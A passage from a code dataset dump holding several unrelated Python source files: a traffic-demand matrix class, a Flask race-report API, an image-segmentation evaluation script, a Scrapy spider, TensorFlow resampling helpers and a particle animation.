endTime: a :py:class:`dta.Utils.Time` instance\n :param timeStep: the granularity of time steps at which the demand is represented.\n :type timeStep: a :py:class:`dta.Utils.Time` instance\n \"\"\"\n self._net = net \n\n if startTime >= endTime:\n raise DtaError(\"Start time %s is grater or equal to the end time %s\" %\n startTime, endTime)\n if timeStep.getMinutes() == 0:\n raise DtaError(\"Time step %s cannot be zero\" % timeStep) \n\n if ((endTime - startTime) % timeStep) != 0:\n raise DtaError(\"Demand interval is not divisible by the demand time step\") \n\n self.startTime = startTime\n self.endTime = endTime\n self.timeStep = timeStep\n self.vehClassName = vehClassName\n\n self._timePeriods = self._getTimePeriods(startTime, endTime, timeStep)\n self._timeLabels = self._timePeriods # map(self._datetimeToMilitaryTime, self._getTimePeriods(startTime, endTime, timeStep))\n\n self._centroidIds = sorted([c.getId() for c in net.iterNodes() if c.isCentroid()]) \n\n self._demandTable = MultiArray(\"d\", [self._timeLabels, self._centroidIds, self._centroidIds])\n \n #TODO: what are you going to do with vehicle class names? \n #self._vehicleClassNames = [vehClass.name for vehClass in self._net.getScenario().vehicleClassNames]\n\n def iterTimePeriods(self):\n \"\"\"\n Return an iterator to the time periods associated with the demand time slices\n \"\"\"\n return iter(self._timePeriods)\n\n def getNumSlices(self):\n \"\"\"\n Return the number of time slices the demand has been split\n \"\"\"\n return len(self._timePeriods)\n \n def _getTimePeriods(self, startTime, endTime, timeStep):\n \"\"\"\n Return the time labels of the different time slices as a list of :py:class:`dta.Utils.Time` instances.\n Each time in the list is the *end* of the time slice.\n \"\"\" \n if ((endTime - startTime) % timeStep) != 0:\n raise DtaError(\"Demand interval is not divisible by the demand time step\") \n \n result = []\n #TODO: this is interesting. The following line fails\n #time = copy.deepcopy(startTime)\n time = Time(startTime.hour, startTime.minute)\n while time != endTime:\n time += timeStep\n result.append(time)\n\n return result \n\n def _timeInMin(self, time):\n \"\"\"\n Return input time in minutes. Input time should be a datetime.datetime or \n datetime.timedelta object\n \"\"\"\n \n if isinstance(time, datetime.datetime):\n return time.hour * 60 + time.minute \n elif isinstance(time, datetime.timedelta):\n return time.seconds / 60 \n \n def setValue(self, timeLabel, origin, destination, value):\n \"\"\"\n Set the value of the given timeLabel, origin, and destination\n \"\"\"\n self._demandTable[timeLabel, origin, destination] = value \n \n def getValue(self, timeLabel, origin, destination):\n \"\"\"\n Return the value of the given time period, origin, and destination\n \"\"\"\n return self._demandTable[timeLabel, origin, destination]\n\n @classmethod\n def writeDynameqDemandHeader(cls, outputStream, startTime, endTime, vehClassName, format='full'):\n \"\"\"\n Write the demand header in the dynameq format\n .. todo:: implement linear writing\n \"\"\"\n \n if format != 'full':\n raise DtaError(\"Unimplemented Matrix Format specified: %s\" % (format))\n \n FORMAT_LINEAR = 'FORMAT:linear'\n FORMAT_FULL = 'FORMAT:full' \n HEADER_LINE1 = '*DEMAND MATRIX ASCII FILE [FULL FORMAT]- GENERATED'\n VEHCLASS_SECTION = 'VEH_CLASS'\n DEFAULT_VEHCLASS = 'Default'\n DATA_SECTION = 'DATA'\n \n\n outputStream.write(\"\\n\\n\\n\")\n outputStream.write('%s %s %s\\n' % (\"Created by python DTA by SFCTA\", \n datetime.datetime.now().strftime(\"%x\"), \n datetime.datetime.now().strftime(\"%X\")))\n if format == 'full':\n outputStream.write('%s\\n' % FORMAT_FULL)\n elif format == 'linear':\n outputStream.write('%s\\n' % FORMAT_LINEAR)\n else:\n raise DtaError(\"Don't understand Dynameq Output Matrix Format: %s\" % (format))\n \n outputStream.write('%s\\n' % VEHCLASS_SECTION)\n outputStream.write('%s\\n' % vehClassName)\n outputStream.write('%s\\n' % DATA_SECTION)\n outputStream.write(\"%s\\n%s\\n\" % (startTime.strftime(\"%H:%M\"),\n endTime.strftime(\"%H:%M\"))) \n\n def writeDynameqTable(self, outputStream, format='full'):\n \"\"\"\n Write the demand in Dynameq format\n .. todo:: implement linear writing\n \"\"\"\n \n if format != 'full':\n raise DtaError(\"Unimplemented Matrix Format specified: %s\" % (format))\n \n SLICE_SECTION = 'SLICE'\n \n timeStepInMin = self.timeStep.getMinutes()\n\n _npyArray = self._demandTable.getNumpyArray()\n \n for i, timePeriod in enumerate(self._timePeriods):\n outputStream.write(\"SLICE\\n%s\\n\" % timePeriod.strftime(\"%H:%M\"))\n outputStream.write(\"\\t%s\\n\" % '\\t'.join(map(str, self._centroidIds)))\n\n for j, cent in enumerate(self._centroidIds):\n outputStream.write(\"%d\\t%s\\n\" % (cent, \"\\t\".join(\"%.2f\" % elem for elem in _npyArray[i, j, :]))) \n \n\n\n def __eq__(self, other):\n \"\"\"\n Implementation of the == operator. The comparison of the \n two demand objects is made using both the data and the labels \n of the underlying multidimensional arrays. \n \"\"\" \n if self.startTime != other.startTime or self.endTime != other.endTime or \\\n self.timeStep != other.timeStep:\n return False \n\n if self._timePeriods != other._timePeriods or self._timeLabels != \\\n other._timeLabels or self._centroidIds != other._centroidIds:\n return False\n\n if self.vehClassName != other.vehClassName:\n return False\n\n if not self._demandTable == other._demandTable:\n return False \n\n return True\n\n def applyTimeOfDayFactors(self, factorsInAList):\n \"\"\"\n Apply the given time of day factors to the existing \n demand object and return a new demand object with as many \n time slices as the number of factors. Each time slice is \n the result of the original table multiplied by a factor \n in the list. \n \"\"\"\n #raise Exception(\"This is not the correct implementation. Change it\") \n if self.getNumSlices() != 1:\n raise DtaError(\"Time of day factors can be applied only to a demand that has only\"\n \" one time slice\")\n for i in range(0,len(factorsInAList)):\n factorsInAList[i] = float(factorsInAList[i])\n \n if abs(sum(factorsInAList) - 1.) > 0.0000001:\n raise DtaError(\"The input time of day factors should sum up to 1.0. Factors are %s\" % factorsInAList) \n \n newTimeStepInMin = self.timeStep.getMinutes() / len(factorsInAList)\n newTimeStep = Time.fromMinutes(newTimeStepInMin)\n \n newDemand = Demand(self._net, self.vehClassName, self.startTime, self.endTime, newTimeStep)\n #timeSpan = (newDemand.endTime - newDemand.startTime).getMinutes()/60.0\n oldDemand = 0\n sliceDemand = []\n for k, timeSlice in enumerate(newDemand._timePeriods):\n sliceDemand.append(0)\n for origin in self._centroidIds:\n for destination in self._centroidIds:\n tripsOD_Old = self.getValue(self.endTime, origin, destination)*len(factorsInAList)\n for k, timeSlice in enumerate(newDemand._timePeriods):\n tripsOD = factorsInAList[k]*tripsOD_Old\n newDemand.setValue(timeSlice, origin, destination, tripsOD)\n \n return newDemand \n\n def removeInvalidODPairs(self):\n \"\"\"\n Examine all the OD interchanges and remove those for which \n a path does not exist from origin to destination\n \"\"\"\n \n for originId in self._centroidIds:\n for destinationId in self._centroidIds:\n for timeLabel in self._timeLabels:\n if self.getValue(timeLabel, originId, destinationId) > 0:\n origin = self._net.getNodeForId(originId)\n destination = self._net.getNodeForId(destinationId)\n if not hasPath(self._net, origin, destination):\n self.setValue(timeLabel, originId, destinationId, 0) \n \n def getTotalNumTrips(self):\n \"\"\"\n Return the total number of trips for all time periods\n \"\"\"\n return self._demandTable.getSum() * self.timeStep.getMinutes() / 60.0\n\n\n","repo_name":"sfcta/dta","sub_path":"dta/Demand.py","file_name":"Demand.py","file_ext":"py","file_size_in_byte":17944,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"72518393388","text":"from Products.CMFCore.permissions import setDefaultRoles\n\n## The Project Name\nPROJECTNAME = \"salesforcepfgadapter\"\n\n## The skins dir\nSKINS_DIR = 'skins'\n\n## Globals variable\nGLOBALS = globals()\n\n## Permission for creating a SalesforcePFGAdapter\nSFA_ADD_CONTENT_PERMISSION = 'PloneFormGen: Add Salesforce PFG Adapter'\nsetDefaultRoles(SFA_ADD_CONTENT_PERMISSION, ('Manager','Owner',))\n\n## Required field marker\nREQUIRED_MARKER = \"(required)\"\n\nSF_ADAPTER_TYPES = ['SalesforcePFGAdapter',]\n\nREQUEST_KEY = '_sfpfg_adapter'\nSESSION_KEY = '_pfgadapter_session'","repo_name":"collective/Products.salesforcepfgadapter","sub_path":"Products/salesforcepfgadapter/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29958955905","text":"import os\nfrom pathlib import Path\nfrom flasgger import swag_from\nfrom flask import jsonify, request, current_app\nfrom flask_restful import Resource, abort, Api\nfrom xml.etree import ElementTree\n\nfrom models.race_model import Race, Driver, Company\nimport app.api.config as yaml_config\n\nPATH_TO_YAML_CONFIG = os.path.join(Path(yaml_config.__file__).parent.absolute(), 'reports_race.yml')\n\n\nclass RaceReport(Resource):\n \"\"\"Race report API\"\"\"\n def __init__(self):\n self.order = request.args.get('order')\n self.format_type = request.args.get('format')\n self.check_order()\n self.order = True if self.order == 'desc' else False\n self.check_format()\n self.race_table = None\n\n @swag_from(PATH_TO_YAML_CONFIG)\n def get(self):\n \"\"\"Handle get request\"\"\"\n race_table_rows = (\n Race.select(Race.place, Driver.name.alias('driver'), Company.name.alias('company'), Race.time)\n .join(Driver, on=(Race.driver == Driver.id))\n .join(Company, on=(Race.company == Company.id))\n .dicts())\n self.race_table = sorted(race_table_rows, key=lambda race: race['place'], reverse=self.order)\n\n if self.format_type == 'json':\n response = jsonify(self.race_table)\n else:\n response = self.prepare_report_to_xml_convert()\n return response\n\n def check_order(self):\n \"\"\"Check order asc, desc\"\"\"\n if not self.order:\n self.order = 'asc'\n if self.order not in ['asc', 'desc']:\n abort(404)\n\n def check_format(self):\n \"\"\"Check format json, xml\"\"\"\n if not self.format_type:\n self.format_type = 'json'\n if self.format_type not in ['json', 'xml']:\n abort(404)\n\n def prepare_report_to_xml_convert(self):\n \"\"\"Prepare race report to xml convert\"\"\"\n root = ElementTree.Element('Races')\n for race in self.race_table:\n title = ElementTree.Element('Race')\n root.append(title)\n place = ElementTree.SubElement(title, 'Place')\n place.text = str(race['place'])\n driver = ElementTree.SubElement(title, 'Driver')\n driver.text = race['driver']\n company = ElementTree.SubElement(title, 'Company')\n company.text = race['company']\n time = ElementTree.SubElement(title, 'Time')\n time.text = race['time']\n tree = ElementTree.ElementTree(root)\n ElementTree.indent(tree, ' ')\n return current_app.response_class(ElementTree.tostring(root), mimetype='application/xml')\n\n\ndef init_api(app):\n api = Api(app)\n api.add_resource(RaceReport, '/api/v1/report/')\n","repo_name":"wspr/herries-press","sub_path":"app/api/reports_race.py","file_name":"reports_race.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"7327531387","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # or any {'0', '1', '2'}\nimport numpy as np\nimport pandas as pd\nfrom statistics import mean\nimport cv2\nimport warnings\nimport tensorflow\nfrom tqdm import tqdm\nfrom tensorflow.keras.callbacks import *\nfrom color_norm import patch_join\nfrom dataset import DataGeneratorFolder,aug_with_crop\nfrom scores_comp import iou_metric,dice_metric\nfrom model import create_model\nwarnings.filterwarnings('ignore')\n# Path for the stain normalized image patches normalized image\ntest_data_path = '/content/TestData/'\n# Path to the full sized test mask for score computation\ngt_path = '/content/drive/MyDrive/intern_pyth/monuseg/TestData/Bin/'\n# Path to model weight and weight name\nmodel_path = '/content/drive/MyDrive/weights'\nweight_name = 'weight_kumar_dataset.h5'\n# Path to save the segmented masks\nif not os.path.exists(\"/content/results\"):\n os.mkdir(\"/content/results\")\nsv_path = '/content/results'\n\n# used height and widht for patch\nimg_width_p = 256\nimg_height_p = 256\n# Full image size\nimg_width_f = 1000\nimg_height_f = 1000\n\ntest_generator = DataGeneratorFolder(root_dir = test_data_path, \n image_folder = 'tis/', \n mask_folder = 'Bin/', \n batch_size=1,augmentation = None,\n image_size=img_width_p,\n nb_y_features = 1)\n\n\nmodel = create_model()\nmodel.load_weights(os.path.join(model_path,weight_name))\n\nout_im = []\n\nprint('Predicting the masks ===========>')\nfor tes in tqdm(range(len(test_generator)),total=len(test_generator)):\n Xtest_n, y_test_n = test_generator.__getitem__(tes)\n predicted = model.predict(np.expand_dims(Xtest_n[0], axis=0)).reshape(img_width_p, img_height_p)\n predicted1= predicted.flatten()\n predicted1[predicted1>=0.5]=1\n predicted1[predicted1<0.5]=0\n predicted2 = predicted1.reshape((img_width_p, img_height_p))\n predicted2 = np.expand_dims(predicted2, -1)\n out_im.append(predicted2)\n\n# Creating full sized segmented image (actual size) from segmented patches\nprint('Joining the segmented patches to original sized masks ===========>')\nout_full,ids_test = patch_join(out_im)\n\n# Writing the masks as image filee to folder\nprint('Writing segmented masks to image files ===========>')\nfor n, id_ in tqdm(enumerate(ids_test), total=len(ids_test)):\n\n imgs = np.reshape(out_full[n]*255,(img_width_f,img_height_f))\n filename = '{}/{}.png'.format(sv_path,os.path.splitext(id_)[0])\n cv2.imwrite(filename, imgs)\n\nprint('Segmented images are saved in {}'.format(sv_path))\n\n# Computing scores (DICE and IOU)\nprint('Scores for the segmented output ===========>')\nscr_met = {'IOU':[],'DICE':[]}\n\nfor _,i in enumerate(ids_test):\n \n gt = gt_path+os.path.splitext(i)[0]+'.png'\n plabel = os.path.join(sv_path,os.path.splitext(i)[0]+'.png')\n\n true = cv2.imread(gt,0).astype(np.bool)\n pred_1 = cv2.imread(plabel,0).astype(np.bool)\n\n dice_coeff = dice_metric(true,pred_1)\n jacc_f = iou_metric(true,pred_1)\n\n scr_met['IOU'].append(jacc_f.item())\n scr_met['DICE'].append(dice_coeff.item())\n print('ID-{} IOU: {:.3}, DICE: {:.3}'.format(os.path.splitext(id_)[0],jacc_f.item(),dice_coeff.item()))\n\n\nprint(\"mean of jaccard: \",mean(scr_met['IOU']))\nprint(\"mean of dice: \",mean(scr_met['DICE']))\n ","repo_name":"shyamfec/NucleiSegNet","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"40437103015","text":"import scrapy\r\nfrom scrapy.http import Request # Add this line to import Request\r\nfrom scrapy.selector import Selector\r\nfrom scrapy.http import FormRequest\r\nimport re\r\nfrom urllib.parse import urlparse\r\nimport pandas as pd\r\n\r\nclass RunningSpider(scrapy.Spider):\r\n name = \"drama\"\r\n \r\n custom_settings = {\r\n 'FEEDS': {\r\n 'items.csv': {\r\n 'format': 'csv',\r\n 'encoding': 'utf8',\r\n 'overwrite': True,\r\n #'fields': ['field1', 'field2', 'field3'], # Add your desired fields here\r\n },\r\n },\r\n }\r\n \r\n def start_requests(self):\r\n self.items_processed = 0 # Initialize the counter\r\n self.item_limit = 101 # Set the maximum number of items to process\r\n \r\n\r\n start_urls=['https://mydramalist.com/people/top']\r\n\r\n \r\n for url in start_urls:\r\n headers = {\r\n 'authority': 'mydramalist.com',\r\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',\r\n 'accept-language': 'en-US,en;q=0.9',\r\n 'referer': 'https://mydramalist.com/people/top',\r\n 'sec-ch-ua': '\"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\"',\r\n 'sec-ch-ua-mobile': '?0',\r\n 'sec-ch-ua-platform': '\"Linux\"',\r\n 'sec-fetch-dest': 'document',\r\n 'sec-fetch-mode': 'navigate',\r\n 'sec-fetch-site': 'same-origin',\r\n 'sec-fetch-user': '?1',\r\n 'upgrade-insecure-requests': '1',\r\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36',\r\n }\r\n \r\n \r\n\r\n yield scrapy.Request(url=url,callback=self.get_list,headers=headers)\r\n\r\n\r\n def get_list(self,response):\r\n\r\n\r\n headers = {\r\n 'authority': 'mydramalist.com',\r\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',\r\n 'accept-language': 'en-US,en;q=0.9',\r\n 'referer': 'https://mydramalist.com/people/top',\r\n 'sec-ch-ua': '\"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\"',\r\n 'sec-ch-ua-mobile': '?0',\r\n 'sec-ch-ua-platform': '\"Linux\"',\r\n 'sec-fetch-dest': 'document',\r\n 'sec-fetch-mode': 'navigate',\r\n 'sec-fetch-site': 'same-origin',\r\n 'sec-fetch-user': '?1',\r\n 'upgrade-insecure-requests': '1',\r\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36',\r\n }\r\n\r\n links=response.xpath('//h6/a/@href').extract()\r\n \r\n for link in links:\r\n link=\"https://mydramalist.com\"+link\r\n print(link)\r\n \r\n yield scrapy.Request(url=link,callback=self.get_category,headers=headers)\r\n\r\n np=response.xpath('//li[@class=\"page-item next\"]/a/@href').get()\r\n if np:\r\n np=\"https://mydramalist.com\"+np\r\n yield scrapy.Request(url=np,callback=self.get_list,headers=headers)\r\n\r\n\r\n def get_category(self,response):\r\n\r\n name=response.xpath('//h1[@class=\"film-title m-b-0 m-r-0\"]/text()').get()\r\n item={}\r\n item['name']=name\r\n i=0\r\n td_elements = response.xpath('//table[@class=\"table film-list\"]//tr').getall()\r\n\r\n data = Selector(text=td_elements[1])\r\n td_elements = data.xpath('.//td//text()').getall()\r\n for data in td_elements:\r\n i=str(i)\r\n data=data.split('\\n')[0]\r\n if data:\r\n # print(data)\r\n \r\n item[i]=data\r\n i=int(i)\r\n i=i+1\r\n if self.items_processed >= self.item_limit:\r\n self.crawler.engine.close_spider(self, 'Reached item limit')\r\n\r\n self.items_processed += 1\r\n yield item\r\n\r\n def close_spider(self, reason):\r\n pass\r\n","repo_name":"mugil1724/webscrappin_retake","sub_path":"drama_scrapy/drama_scrapy/spiders/drama_spider.py","file_name":"drama_spider.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40311323995","text":"import io\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport sys\ndef plot_to_image(figure, add_dim = True):\n \"\"\"\n Converts the matplotlib plot specified by 'figure' to a PNG image and\n returns it. The supplied figure is closed and inaccessible after this call.\n \"\"\"\n \n buf = io.BytesIO()\n \n # Use plt.savefig to save the plot to a PNG in memory.\n plt.savefig(buf, format='png')\n \n # Closing the figure prevents it from being displayed directly inside\n # the notebook.\n plt.close(figure)\n buf.seek(0)\n \n # Use tf.image.decode_png to convert the PNG buffer\n # to a TF image. Make sure you use 4 channels.\n image = tf.image.decode_png(buf.getvalue(), channels=4)\n \n if(add_dim):\n # Use tf.expand_dims to add the batch dimension\n image = tf.expand_dims(image, 0)\n \n return image\n\n# https://github.com/tensorflow/tensorflow/issues/14451\n# if equal to 0 then oversample_classes() always returns 1\ndef oversample_classes(label, label_probs, label_target_probs, oversampling_coef = 0.2):\n \"\"\"\n Returns the number of copies of given example\n \"\"\"\n print(label)\n label = tf.math.argmax(label, axis= -1, output_type=tf.dtypes.int32)\n label_prob = label_probs.lookup(label)\n label_target_prob = label_target_probs.lookup(label)\n \n prob_ratio = tf.cast(label_target_prob/label_prob, dtype=tf.float32)\n # soften ratio is oversampling_coef==0 we recover original distribution\n prob_ratio = prob_ratio ** oversampling_coef \n # for classes with probability higher than class_target_prob we\n # want to return 1\n prob_ratio = tf.math.maximum(prob_ratio, 1) \n # for low probability classes this number will be very large\n repeat_count = tf.math.floor(prob_ratio)\n # prob_ratio can be e.g 1.9 which means that there is still 90%\n # of change that we should return 2 instead of 1\n repeat_residual = prob_ratio - repeat_count # a number between 0-1\n residual_acceptance = tf.math.less_equal(\n tf.random.uniform([], dtype=tf.float32), repeat_residual\n )\n\n residual_acceptance = tf.cast(residual_acceptance, tf.int64)\n repeat_count = tf.cast(repeat_count, dtype=tf.int64)\n \n return tf.reshape(repeat_count + residual_acceptance, []) #convert tensor to scalar tensor\n\n\n# undersampling coef if equal to 0 then oversampling_filter() always returns True\ndef undersampling_filter(value, label, label_probs, label_target_probs,undersampling_coef = 0.8):\n \"\"\"\n Computes if given example is rejected or not.\n \"\"\"\n print(label)\n\n newlabel = tf.math.argmax(label, axis= -1, output_type=tf.dtypes.int32)\n label_prob = label_probs.lookup(newlabel)\n label_target_prob = label_target_probs.lookup(newlabel)\n prob_ratio = tf.cast(label_target_prob/label_prob, dtype=tf.float32)\n prob_ratio = prob_ratio ** undersampling_coef\n prob_ratio = tf.math.minimum(prob_ratio, 1.0)\n \n #return tf.cond(tf.random.uniform([], dtype=tf.float32) <= prob_ratio, lambda: tf.data.Dataset.from_tensors((value, label)), lambda: tf.data.Dataset())\n return tf.reshape(tf.math.less_equal(tf.random.uniform([], dtype=tf.float32), prob_ratio), [])\n\n \n\n","repo_name":"veikkahonkanen/ML-Seizurenet","sub_path":"tensorflow_utils.py","file_name":"tensorflow_utils.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"24457069248","text":"'''Viewport object, used to draw objects into user interface'''\nfrom typing import List\n\nfrom PyQt5 import QtWidgets, QtGui\n#from PyQt5.QtWidgets import (QColorDialog)\nfrom PyQt5.QtGui import QColor\n\nfrom src.model.objects import ViewportObjectRepresentation\n\n\nclass ViewPort(QtWidgets.QLabel):\n \"\"\"\n Class to be the drawing area of application viewport\n \"\"\"\n\n def __init__(self, parent):\n super().__init__(parent)\n\n # Object style sheet\n stylesheet = '''\n QLabel {\n background-color: white;\n border: 1px solid black\n }\n '''\n self.setStyleSheet(stylesheet)\n\n # Varaible to hold objects to be drawn\n self.objects: List[ViewportObjectRepresentation] = []\n\n def draw_objects(self, objects: List[ViewportObjectRepresentation]):\n \"\"\"\n Redraw view, checking if objects are inside the viewport\n\n Parameters\n ----------\n objects: List[ViewportObjectRepresentation]\n List of objects to be draw\n \"\"\"\n\n self.objects = objects\n self.update()\n\n def paintEvent(self, _event: QtGui.QPaintEvent):\n '''Reimplementing paint event function, that is called by update'''\n\n painter = QtGui.QPainter()\n painter.begin(self)\n pen = QtGui.QPen()\n for obj in self.objects:\n # Get specific attributes\n pen.setWidth(obj.thickness)\n pen.setColor(obj.color)\n painter.setPen(pen)\n\n # In case it is a point\n if len(obj.points) == 1:\n point = obj.points[0]\n painter.drawPoint(point.x, point.y)\n\n # In case it is a line\n elif len(obj.points) == 2:\n init_p, end_p = obj.points\n painter.drawLine(init_p.x, init_p.y,\n end_p.x, end_p.y)\n\n # In case it is a wireframe\n else:\n init_p = obj.points[0]\n prev_p = init_p\n for current_p in obj.points[1:]:\n painter.drawLine(prev_p.x, prev_p.y,\n current_p.x, current_p.y)\n prev_p = current_p\n\n last_p = obj.points[-1]\n painter.drawLine(last_p.x, last_p.y,\n init_p.x, init_p.y)\n\n # drawing the view port border\n pen.setWidth(2)\n pen.setColor(QColor(255, 0, 0))\n painter.setPen(pen)\n\n painter.drawLine(10, 10, 590, 10)\n painter.drawLine(10, 10, 10, 590)\n painter.drawLine(10, 590, 590, 590)\n painter.drawLine(590, 10, 590, 590)\n\n painter.end()\n","repo_name":"shthiago/INE5420","sub_path":"src/view/viewport.py","file_name":"viewport.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71222967787","text":"def calcula_dobro(numero):\n\ttotal = numero * 2\n\treturn total\n\na = calcula_dobro(8)\nprint(a)\n\n\n# As an array as a parameter\ndef calcula_soma_numeros(*numeros):\n\ttotal = 0\n\tfor numero in numeros:\n\t\ttotal += numero\n\treturn total\n\t# or just return sum(numeros) \n\nsoma = calcula_soma_numeros(2,3,4,6)\nprint(\"O resultado da soma e \", soma)\n\n\n# As an array as a parameter with 2 dimensions\ndef calcula_soma_numeros2(num1, num2,**numeros):\n\tresultado = 0\n\tfor item in numeros:\n\t\tresultado =+ numeros[item]\n\treturn resultado \n\t# Or Return sum(numeros.values())\n\nsoma2 = calcula_soma_numeros2(num1=5, num2=10, num3=20)\nprint(\"O resultado da soma da funcao2 e \", soma2)","repo_name":"felipeDS91/udemy-curso-web","sub_path":"python/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3483271126","text":"from machine import Pin, I2C\nimport dht\nimport ssd1306\nimport time\n\nsens=dht.DHT11(Pin(12))\ni2c=I2C(sda=Pin(4),scl=Pin(5))\ndisplay=ssd1306.SSD1306_I2C(128,64,i2c)\n\n\nwhile True:\n display.fill(0)\n sens.measure()\n display.text(\"Weather Station\",0,0,1)\n display.text(\"Celsius: \"+str(sens.temperature())+\"C\",0,28,1)\n display.text(\"Humidity: \"+str(sens.humidity())+\"%RH\",0,55,1)\n display.show()\n time.sleep(0.01)\n","repo_name":"Aesgiyr/esp8266-microPython","sub_path":"weatherStation/weatherStation.py","file_name":"weatherStation.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73035147306","text":"import matplotlib.pyplot as pl\nimport matplotlib.animation as an\n\nimport random\nimport string\n\nclass Animation(object):\n \"\"\"\n An object representing the visual animation and offering methods to handle\n most of the animation code.\n \"\"\"\n\n def __init__(self, particles, frame_callback, scale):\n \"\"\"\n Arguments:\n particles: the list of Particle objects to display on the \n animation.\n frame_callback: the function to call after drawing each new frame.\n scale: half the side length of the animation window (which is \n square).\n \"\"\"\n \n self._particles = particles\n self._frame_callback = frame_callback\n self._scale = scale\n\n self._frame = 0\n\n self._patches = map(make_patch, self._particles)\n \n def _init_animation(self):\n \"\"\"\n Initialise the animation by creating the figures and scaling the axes.\n \n Returns: the list of patches.\n \"\"\"\n \n self._main_figure.gca().axis(\n [-self._scale, self._scale, -self._scale, self._scale])\n \n self._main_figure.gca().autoscale(False)\n\n for patch in self._patches:\n self._main_figure.gca().add_artist(patch)\n\n return self._patches\n\n def _next_step(self, frame):\n \"\"\"\n Update the patches to produce the next animation frame.\n \n Arguments:\n frame: an int representing the current frame.\n \n Returns: the list of patches.\n \"\"\"\n \n # Calculate the next simulation step.\n self._frame_callback(self)\n\n for particle, patch in zip(self._particles, self._patches):\n patch.center = particle.get_current_position()\n\n self._frame += 1\n\n return self._patches\n\n def get_current_frame_number(self):\n \"\"\"\n Get the integer number of frames elapsed so far.\n \n Returns: the current frame number as an int.\n \"\"\"\n \n return self._frame\n\n def get_pyplot_animation(self):\n \"\"\"\n Get the matplotlib FuncAnimation object that is dealing with the\n animation.\n \n Returns: the matplotlib FuncAnimation object responsible for the\n animation.\n \"\"\"\n \n return self._sim_animation\n \n def start(self, block=True, interval=10, size=(10, 10)):\n \"\"\"\n Begin the animation.\n \n Arguments:\n block: whether to stop anything else executing (other than the \n callback function) while the animation runs.\n interval: the time (in milliseconds) between frames.\n size: the size of the plot (in inches, because matplotlib takes\n inches by default), as a tuple.\n \"\"\"\n \n self._main_figure = pl.figure(\"Animation\", figsize=size)\n\n # We have to assign a variable to this animation or the garbage\n # collector will throw it out and nothing will work.\n self._sim_animation = an.FuncAnimation(\n self._main_figure,\n self._next_step,\n interval=interval,\n blit=True,\n init_func=self._init_animation\n )\n\n pl.show(block)\n \ndef make_patch(particle):\n \"\"\"\n Create a patch for a particle.\n \n Arguments:\n particle: a Particle object.\n \n Returns: a Circle patch representing the particle, or a projection of\n the particle onto the xy plane.\n \"\"\"\n\n if particle.is_immovable():\n return pl.Circle(\n particle.get_current_position(),\n particle.get_radius(),\n fill=False\n )\n else:\n if particle.get_colour() is not None:\n fill_colour = particle.get_colour()\n else:\n # Generate random colour.\n fill_colour = \"#\" + string.zfill(\n hex(random.randrange(0, 16777215))[2:], 6)\n\n return pl.Circle(\n particle.get_current_position(),\n particle.get_radius(),\n color=fill_colour)","repo_name":"David-Hickey/thermodynamics-snookered","sub_path":"animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37798444515","text":"numToEnter=input(\"Type a number: \")\nnumList=[]\nnumAmnt=0\nhasAlerted=False\nwhile numToEnter != '' or numAmnt<2:\n if numToEnter.isnumeric()==True:\n numList.append(int(numToEnter))\n numAmnt+=1\n if numAmnt>1 and hasAlerted==False:\n print(\"You have enough numbers, but feel free to add another(ENTER to stop)\")\n hasAlerted=True\n numToEnter=input(\"Type a number: \")\nprint(str(numList))\nnumList.sort()\nprint(str(numList))\nnumList.sort(reverse=True)\nprint(str(numList))\n","repo_name":"zachshah/PythonChallenges2","sub_path":"Challenge4.py","file_name":"Challenge4.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8011122161","text":"#!/usr/bin/python3\n\"\"\"Script takes in a URL, sends a request to the URL\nand displays the value of the X-Request-Id variable found in the header\n\"\"\"\nimport sys\nimport urllib.request\n\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n resp = urllib.request.Request(url)\n with urllib.request.urlopen(resp) as holder:\n print(dict(holder.headers).get('X-Request-Id'))\n","repo_name":"Dessira/alx-higher_level_programming","sub_path":"0x11-python-network_1/1-hbtn_header.py","file_name":"1-hbtn_header.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41096077857","text":"# coding: 